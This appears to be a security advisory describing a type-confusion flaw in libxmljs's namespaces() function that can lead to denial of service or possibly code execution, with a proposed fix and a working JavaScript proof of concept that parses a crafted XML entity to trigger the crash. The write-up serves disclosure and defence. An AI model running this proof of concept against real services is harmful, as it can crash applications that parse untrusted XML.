libxmljs namespaces type confusion RCE

An attacker can trigger this vulnerability by parsing a specially crafted XML document. The vulnerability occurs when the namespaces() function is invoked with `onlyLocal` set to true on a grand-child of a node that refers to an entity. Specifically, a PUBLIC entity clause with a publicID can cause `nsDef` to point to the publicID string. This leads to a type confusion in `_wrap__xmlNode_nsDef_get` when it attempts to convert the pointer, potentially allowing for denial of service and remote code execution [ref_id=1].

The vulnerability resides in the SWIG-generated function `_wrap__xmlNode_nsDef_get()`. This function is called by the `namespaces()` method in libxmljs when the `onlyLocal` parameter is set to true [ref_id=1]. The issue arises from how `SWIG_ConvertPtr` handles type conversions for `arg10` within this function.

The suggested fix is to add a check within `_wrap__xmlNode_nsDef_get()` to verify that the `arg10` parameter is indeed an `xmlNode`. This validation ensures that the function does not attempt to process incompatible types, thereby preventing the type confusion that could lead to exploitation.

```javascript const libxmljs = require('libxmljs');

var d = `<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note [ <!ENTITY writer PUBLIC "` + "A".repeat(8) + "B".repeat(8) + "C".repeat(8) + "D".repeat(8) + "P".repeat(8) + `" "JFrog Security"> ]> <from>&writer;</from> `;

t = libxmljs.parseXml(d) from = t.get('//from') c = from.childNodes()[0] c2 = c.childNodes()[0] //entity_decl n = c2.namespaces(true) //onlyLocal = true ``` Run with: `$ node DoS.js` [ref_id=1]